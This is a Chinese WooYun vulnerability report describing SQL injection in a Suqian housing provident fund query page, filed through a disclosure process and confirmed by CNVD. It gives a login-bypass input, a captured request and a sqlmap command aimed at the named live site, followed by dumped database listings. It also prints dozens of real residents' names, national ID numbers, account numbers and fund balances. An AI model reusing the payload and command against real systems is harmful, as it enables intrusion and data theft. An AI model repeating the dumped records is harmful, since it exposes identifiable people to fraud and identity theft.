当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126039

漏洞标题:某市住房公积金管理中心SQL注射漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: 毛毛虫

提交时间:2015-07-13 08:53

修复时间:2015-08-31 16:16

公开时间:2015-08-31 16:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-27: 细节向核心白帽子及相关领域专家公开
2015-08-06: 细节向普通白帽子公开
2015-08-16: 细节向实习白帽子公开
2015-08-31: 细节向公众公开

简要描述:

宿迁市住房公积金管理中心存在SQL注射漏洞,无须身份证号和储蓄卡号即可查询用户的公积金余额,太不小心了,大量泄漏用户住房公积金信息!

详细说明:

<code区域1>
http://www.sqzfgjj.com/Query_Sspersons.aspx
您的身份证号输入'or'1'='1
您的储蓄卡号输入'or'1'='1

公积金余额.jpg


<code区域2>
POST /Query_Sspersons.aspx HTTP/1.1
Host: www.sqzfgjj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.sqzfgjj.com/Query_Sspersons.aspx
Cookie: ASP.NET_SessionId=cn02jdzhek4dkt55zjz0a2qf
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEzODI5NTg4MDdkZPYKRswPZ68G0Ma2G7JXT9fqC2ZT&ZLTextBox_spidno=1111111111111&ZLTextBox_spcard=22222222222222&Button_Query=++%E6%8F%90%E4%BA%A4++
利用sqlmap跑库
sqlmap.py -u "http://www.sqzfgjj.com/Query_Sspersons.aspx" --
data="__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEzODI
5NTg4MDcPZBYCAgIPZBYYAgMPDxYCHgRUZXh0BQExZGQCCQ8PFgIfAAUBMWRkAhMPDxYCHwBlZGQCFw8
PFgIfAGVkZAIbDw8WAh8AZWRkAh8PDxYCHwBlZGQCIw8PFgIfAGVkZAInDw8WAh8AZWRkAisPDxYCHwB
lZGQCLw8PFgIfAGVkZAIzDw8WAh8AZWRkAjcPDxYCHwBlZGRkb9ruy06%2BKd0YfAPSMEeqDKrSLCM%3
D&ZLTextBox_spidno=1&ZLTextBox_spcard=1&Button_Query=++%E6%8F%90%E4%BA%A4++" --r
isk=3 -v3 –dbs --tables
暴漏操作系统信息、数据库信息、IIS信息和ASP信息

暴漏系统信息.jpg

漏洞证明:

(1)数据库信息
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: ABIS_SQZFGJJ
[16 tables]
+--------------------------------------------+
| dtproperties |
| sysconstraints |
| syssegments |
| t_sys_Admin |
| t_sys_Branch |
| t_sys_Data |
| t_sys_Group |
| t_sys_Log |
| t_sys_Menu |
| t_sys_UserOnline |
| t_sys_UserOnline |
| t_sys_r_GroupMenu |
| t_sys_r_UserGroup |
| t_user_house |
| t_user_pmlsht |
| t_user_sspersons |
+--------------------------------------------+
Database: msdb
[82 tables]
+--------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_datatype_info_ext |
| spt_datatype_info_ext |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_provider_types |
| spt_server_info |
| spt_values |
| sysconstraints |
| syslogins |
| sysoledbusers |
| sysopentapes |
| sysremotelogins |
| syssegments |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------------------+
(2)数据库中表统计信息
Database: ABIS_SQZFGJJ
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.t_user_sspersons | 71961 |
| dbo.t_user_pmlsht | 8645 |
| dbo.t_sys_Log | 401 |
| dbo.sysconstraints | 27 |
| dbo.t_user_house | 26 |
| dbo.t_sys_Data | 22 |
| dbo.t_sys_Menu | 15 |
| dbo.t_sys_r_GroupMenu | 9 |
| dbo.t_sys_Branch | 7 |
| dbo.syssegments | 3 |
| dbo.t_sys_UserOnline | 3 |
| dbo.t_sys_UserOnline | 3 |
| dbo.t_sys_Admin | 1 |
| dbo.t_sys_Group | 1 |
| dbo.t_sys_r_UserGroup | 1 |
+-----------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended] | 2155 |
| dbo.[Order Details Extended] | 2155 |
| dbo.Invoices | 2155 |
| dbo.[Order Subtotals] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.[Orders Qry] | 830 |
| dbo.[Summary of Sales by Quarter] | 809 |
| dbo.[Summary of Sales by Year] | 809 |
| dbo.[Customer and Suppliers by City] | 120 |
| dbo.Customers | 91 |
| dbo.[Quarterly Orders] | 86 |
| dbo.[Product Sales for 1997] | 77 |
| dbo.[Sales by Category] | 77 |
| dbo.[Alphabetical list of products] | 69 |
| dbo.[Current Product List] | 69 |
| dbo.[Products by Category] | 69 |
| dbo.[Sales Totals by Amount] | 66 |
| dbo.Territories | 53 |
| dbo.EmployeeTerritories | 49 |
| dbo.sysconstraints | 43 |
| dbo.Suppliers | 29 |
| dbo.[Products Above Average Price] | 25 |
| dbo.[Products Above Average Price] | 25 |
| dbo.Employees | 9 |
| dbo.[Category Sales for 1997] | 8 |
| dbo.Categories | 8 |
| dbo.Region | 4 |
| dbo.Shippers | 3 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
(3)数据表内容,暴漏用户的各种信息(姓名、身份证号、缴费卡号、缴费金额、剩余金额、缴费时间、缴存比例等)。
Database: ABIS_SQZFGJJ
Table: t_user_sspersons
[41 entries]
+--------------------------------------+--------------------+--------+--------+-
----------+-----------+----------+--------+--------+---------+---------+
| id | spidno | spjym | spname |
spcode | spmend | spcard | sncode | spjcbl | spsingl | spmfact |
+--------------------------------------+--------------------+--------+--------+-
----------+-----------+----------+--------+--------+---------+---------+
| 00036303-F843-4B04-86FE-17DD77564434 | 320823197309086231 | 201309 | 杜学飞
| 002977022 | 107570.63 | 00022701 | 004514 | 12.00 | 12.00 | 1962.00 |
| 0003EBBA-48EC-4850-A2CD-C476FDF2DE01 | 321302198104050813 | 201303 | 张雷
| 010201092 | 25324.21 | 00033773 | 006757 | 12.00 | 12.00 | 560.00 |
| 0005484D-5706-4978-863E-EC140A291412 | 32082319531117221X | 201309 | 周立方
| 013076904 | 32450.42 | 00065220 | 021539 | 9.00 | 9.00 | 536.00 |
| 0005739D-E13D-4344-8E7B-81359C24576F | 320825197905243910 | 201309 | 付爱兵
| 018765636 | 13239.03 | 00089751 | 014639 | 12.00 | 12.00 | 428.00 |
| 0005D278-3BCF-4981-97CD-37A7A0011056 | 320823196506285067 | 201309 | 范乃云
| 013868387 | 29387.49 | 00073865 | 022382 | 9.00 | 9.00 | 492.00 |
| 00078BE8-02D9-4CDF-82E5-863FA6B58563 | 320881640906501 | 201306 | 陆裕德
| 012207575 | 57030.83 | 00019354 | 019888 | 12.00 | 12.00 | 1254.00 |
| 0007AD85-5A8B-49F8-BFA9-E50142E6C1CC | 320881197912220830 | 201308 | 王东
| 017896269 | 15454.91 | 00082255 | 024817 | 8.00 | 8.00 | 384.00 |
| 0007E36B-5BC1-4873-94F6-AB5B4C105280 | 320105198210031824 | 201309 | 胡乃康
| 013897827 | 11443.11 | 00070914 | 022413 | 9.00 | 9.00 | 434.00 |
| 000A5556-973D-4970-9D90-086FE818125B | 320827196402074455 | 201212 | 何业军
| 015543539 | 5173.86 | 00035824 | 024344 | 9.00 | 9.00 | 412.00 |
| 000AA1EB-94EC-4762-96A6-90F0D071B712 | 320881197710230416 | 201309 | 唐威
| 011528035 | 23136.22 | 00015708 | 016926 | 12.00 | 12.00 | 1126.00 |
| 000ACB8C-AD1C-4FBC-B901-16EFBFE72882 | 321322198212130701 | 201309 | 廉露
| 015676330 | 26290.16 | 00103961 | 004396 | 12.00 | 12.00 | 1918.00 |
| 000AEBD5-5B32-4C86-8043-1EBDD2E11D80 | 320823196303020026 | 201309 | 朱剑
| 003297620 | 69648.53 | 00024860 | 005063 | 12.00 | 12.00 | 2338.00 |
| 000AFBC3-6FF0-4047-8D46-A4BCA547DF5F | 360426198107010617 | 201308 | 蒋振国
| 017048899 | 13899.27 | 00081783 | 027409 | 12.00 | 12.00 | 380.00 |
| 000E7616-5654-46DA-B859-0F5E30A4D160 | 321302197402090819 | 201309 | 王志超
| 002077383 | 52578.56 | 00054183 | 002959 | 12.00 | 12.00 | 1028.00 |
| 000EF42C-0989-4704-9815-07299EA2DA02 | 321302197105160614 | 201309 | 陆辉
| 009700203 | 24979.18 | 00012936 | 014871 | 9.00 | 9.00 | 352.00 |
| 000FD0CF-D2C4-474D-8669-B0D5989D52CE | 320823196608139730 | 201309 | 窦道奇
| 000138931 | 77603.15 | 00013524 | 000274 | 12.00 | 12.00 | 1530.00 |
| 0011B4CA-8EB8-43D5-A2D7-92D9745675AA | 321322198309120067 | 201306 | 华冬云
| 010406015 | 24893.41 | 00052951 | 004822 | 12.00 | 12.00 | 839.52 |
| 0011C425-F5E9-4F44-903D-19D3CC5324D0 | 320825196609143363 | 201308 | 孟召芝
| 005043401 | 37020.58 | 00027458 | 007375 | 12.00 | 12.00 | 632.00 |
| 00124BB9-C899-4212-A50B-A2EAB2294698 | 321322196502050014 | 201309 | 徐克农
| 012852956 | 29386.81 | 00078182 | 021262 | 9.00 | 9.00 | 492.00 |
| 00133D60-C6D1-45C3-A06F-5F12C67221EF | 320819197403020410 | 201309 | 张刚
| 009032795 | 19408.58 | 00014071 | 000274 | 12.00 | 12.00 | 1200.00 |
| 0013AD1C-AD49-4510-BD19-D6F684917834 | 321322198502102629 | 201308 | 周晗
| 016212619 | 22944.62 | 00099939 | 016604 | 12.00 | 12.00 | 760.00 |
| 0014771A-D388-407D-9463-A1B5FF66A6DC | 320825750814571 | 201308 | 于之才
| 009895136 | 5101.53 | 00034751 | 007154 | 12.00 | 12.00 | 592.00 |
| 00148831-B7B6-4CF0-8A22-519CF9D1D442 | 320823197106010229 | 201307 | 刘敏
| 003035581 | 13818.42 | 00020148 | 004546 | 10.00 | 10.00 | 416.00 |
| 0015138F-2056-4C83-AF57-AB755980F9AE | 320827591007021 | 200812 | 马跃
| 000029314 | 37781.67 | 00012285 | 000088 | 9.00 | 9.00 | 348.00 |
| 0015848A-2F8E-4986-83FD-9A258A38C6D3 | 320823821128041 | 201309 | 肖伟伟
| 010608110 | 27981.55 | 00014324 | 000088 | 12.00 | 12.00 | 610.00 |
| 0016771D-1E51-4118-80E7-CD579938D5B2 | 321302198209090854 | 201303 | 殷文明
| 012151559 | 60515.24 | 00016639 | 000111 | 12.00 | 12.00 | 1541.00 |
| 0016CE20-67CA-427D-9A55-53540C0B2739 | 320825196312042828 | 201308 | 刘玲
| 011372412 | 26256.43 | 00062495 | 018127 | 12.00 | 12.00 | 486.00 |
| 00170AC5-2CD8-4AC5-BF3E-C0C7736E7116 | 360103197611111913 | 201309 | 陶友珍
| 017423396 | 30988.05 | 00100515 | 026587 | 12.00 | 12.00 | 1022.00 |
| 001859D3-C5E6-49CA-AD20-483B0D79203B | 32132419850713362X | 201308 | 严慧慧
| 016207176 | 23261.00 | 00099884 | 016604 | 12.00 | 12.00 | 786.00 |
| 0019AD56-4AF7-4EE4-9594-E1B6E51DD905 | 321321196705042253 | 201309 | 蔡柏
| 011003636 | 35315.04 | 00014779 | 017938 | 8.00 | 8.00 | 626.00 |
| 0019B7EB-BA15-4503-9D11-97CA41CD825D | 320819196908070849 | 201309 | 陈巧燕
| 001447085 | 47920.97 | 00004282 | 001822 | 12.00 | 12.00 | 994.00 |
| 001ACBB9-8F56-4C40-8ECC-A12CE17BD9B6 | 220183198008023017 | 201309 | 刘大勇
| 020571322 | 33858.71 | 00085537 | 027216 | 10.00 | 10.00 | 2000.00 |
| 001B1C9F-5E9C-4B1E-8E7C-FC9D04E62FEC | 320819570430081 | 201309 | 王文成
| 001731684 | 28080.62 | 00007646 | 002411 | 12.00 | 12.00 | 1326.00 |
| 001B7575-F68D-48FD-B25E-1907B981603E | 320823197311070255 | 201309 | 黄兴刚
| 001756264 | 35682.60 | 00004610 | 002425 | 12.00 | 12.00 | 1267.00 |
| 001BAB84-6D04-4F1D-B846-552938EF99D0 | 320824721203001 | 201309 | 王波
| 005931563 | 30350.54 | 00046999 | 009097 | 9.00 | 9.00 | 1086.00 |
| 001C0ED2-0355-4EFB-91CE-A74E58C39FCC | 320825195709262517 | 201308 | 仓业林
| 011408612 | 27204.77 | 00062254 | 018127 | 12.00 | 12.00 | 486.00 |
| 001C534A-ABDF-4DCD-AD74-A23AB06E17F5 | 320825197403162563 | 201309 | 王学林
| 019187930 | 34998.24 | 00095431 | 027216 | 10.00 | 10.00 | 1518.00 |
| 001CA97E-B4C2-4BE5-B47F-E264F825C2DE | 320881198010211630 | 201306 | 杨军
| 018375187 | 6629.65 | 00105821 | 027396 | 5.00 | 5.00 | 180.00 |
| 001E3CDD-1E9C-429C-A803-E8E411766209 | 320881701125004 | 201309 | 王玉
| 015611397 | 32390.58 | 00019925 | 003096 | 12.00 | 12.00 | 1354.00 |
| 001E40A9-0E20-45E2-B4AA-8845D81CE731 | 321302198705030826 | 201011 | 于柳
| 018564820 | 686.53 | 00082563 | 018127 | 9.00 | 9.00 | 162.00 |
| 0020B017-D8A1-4D59-95BF-BF8FD833A242 | 32132319831227002X | 201309 | 冯君
| 019186036 | 23593.21 | 00094663 | 003573 | 12.00 | 12.00 | 976.00 |
+--------------------------------------+--------------------+--------+--------+-
----------+-----------+----------+--------+--------+---------+---------+
Database: Northwind
Table: Shippers
[3 entries]
+-----------+----------------+------------------+
| ShipperID | Phone | CompanyName |
+-----------+----------------+------------------+
| 3 | (503) 555-9931 | Federal Shipping |
| 1 | (503) 555-9831 | Speedy Express |
| 2 | (503) 555-3199 | United Package |
+-----------+----------------+------------------+
(4)用户信息7万多条,只跑了几条,已经起到警示作用,希望管理中心引起重视。

修复方案:

修改SQL注入漏洞,同时加固系统安全

版权声明:转载请注明来源 毛毛虫@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-17 16:15

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无